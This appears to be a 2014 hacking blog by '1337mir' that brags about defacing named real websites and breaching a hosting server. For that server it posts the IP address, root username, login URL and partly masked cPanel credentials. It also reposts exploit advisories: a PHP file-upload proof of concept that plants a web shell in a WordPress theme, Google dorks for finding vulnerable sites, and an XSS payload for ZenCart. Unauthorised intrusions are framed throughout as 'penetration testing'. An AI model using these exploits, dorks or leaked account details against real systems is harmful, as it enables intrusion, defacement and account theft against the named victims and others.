hacking

server saturno.tropicalserver.net penetrate and security

By |May 11th, 2014|

server saturno.tropicalserver.net penetrate and security tested by 1337mir

ip:188.165.93.13
host:saturno.tropicalserver.net
root user: info2com
root password: in*****(hidden for security reason)
login: http://188.165.93.13:2082/

defaced page link: http://zone-h.net/mirror/id/22343943

notified all user to change password and sent them vulnerability details via email.

cpanel username and password below:
username:abclviaj
password:*****(hidden for security reason)
username:bandido
password:*****(hidden for security reason)
username:barthe
password:*****(hidden for security reason)
username:bit2man
password:*****(hidden for security reason)
username:centabac
password:6*****(hidden for security reason)
username:chaparro
password:6*****(hidden for security reason)
username:chinxeto
password:6*****(hidden for security […]

Comments Off on server saturno.tropicalserver.net penetrate and security

O TV Lebanon penetrate and hacked

By |May 4th, 2014|

O TV Lebanon penetrate and hacked By 1337MiR.
website address: http://www.otv.com.lb
ip: 65.254.41.214
date: 05-04-14

defaced page: http://www.otv.com.lb/1337mir.html
cache mirror: http://dark-h.org/deface/id/57336

contacted them , but didnt respond.

screenshot:

Comments Off on O TV Lebanon penetrate and hacked

Kesserwen Al Asiya Newspaper website penetration testing

By |May 3rd, 2014|

Kesserwen Al Asiya Newspaper website penetration testing by 1337mir.
website: http://kesserwen.org/
ip: 192.217.123.88
date: 05-03-2014 09:36AM
deface page: http://kesserwen.org/1337mir.html
zone-h mirror: http://zone-h.net/mirror/id/22295807

contacted  them, but didn’t respond.

screenshot:

Comments Off on Kesserwen Al Asiya Newspaper website penetration testing

WordPress plugin EZPZ One Click Backup Command Injection

By |May 2nd, 2014|

Product: WordPress plugin EZPZ One Click Backup
Vulnerability type: CWE-78 OS Command Injection
Vulnerable versions: 12.03.10 and some earlier versions
google Dork: intext:plugins/ezpz-one-click-backup/
credits: Henri Salo
Fixed version: N/A
Solution: Remove plugin
Vendor notification: Contact details N/A
WordPress plugins team notification: 2014-04-30
Risk: High
CVE: CVE-2014-3114

Vulnerability Details:

Contains a flaw that is triggered as input passed via the ‘cmd’ parameter in
ezpz-archive-cmd.php is not properly sanitized. With […]

Comments Off on WordPress plugin EZPZ One Click Backup Command Injection

WordPress Themes Theagency File Upload Vulnerability

By |April 29th, 2014|

Title : WordPress Themes Theagency File Upload Vulnerability
Author : AnonBoy
Google Dork : inurl:/wp-content/themes/theagency
Date : 21/04/2014
Facebook : https://www.facebook.com/nufailienafratsim.moechtar
Vandor : N/a
Tested on : Windows 7

POC:
< ?- php

$uploadfile=”x.php.jpg”; $ch = curl_init(“http://localhost/wp-content/themes/theagency/includes/uploadify/uploadify.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Shell Access:
http://localhost/wp-content/themes/theagency/includes/uploadify/uploads/x.php.jpg
————————————————————————————–

Greeting:./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./hexy khan
./Gantengers Crew

Comments Off on WordPress Themes Theagency File Upload Vulnerability

Metropolitan College of NewYork website penetrate

By |March 13th, 2014|

Metropolitan College of NewYork website penetration testing by 1337mir

website: http://www.mcny.edu/
ip: 216.70.80.92
defaced page: http://www.mcny.edu/1337mir.html
zone-h mirror: http://zone-h.net/mirror/id/22004967

 

Screenshot:

Comments Off on Metropolitan College of NewYork website penetrate

ZenCart 1.5.1 Multiple Vulnerabilities

By |February 24th, 2014|

Exploit Title: ZenCart v1.5.1 – Multiple Vulnerabilities
Exploit Author: UmPire
Date: 21 Feb 2014
Vendor Homepage: https://www.zen-cart.com/
Version: 1.5.1
Tested on: Windows
Google Dork: inurl:”zc_install/index.php”

Cross Site Scripting Vulnerability
In the fourth step of installation, there are vulnerable fields.
vulnerable input: ” onmouseover=alert(/Hacked/) bad=”

Full Path Disclosure
In the third step of installation there is this vulnerability
Path_Translated = Drive:\\[WebPage-Directiory]\\[USER]\\zen\\zc_install\\index.php

Sensitive phpinfo reading
This is in this path:
http://[Host]/zen/zc_install/includes/phpinfo.php

Demo […]

Comments Off on ZenCart 1.5.1 Multiple Vulnerabilities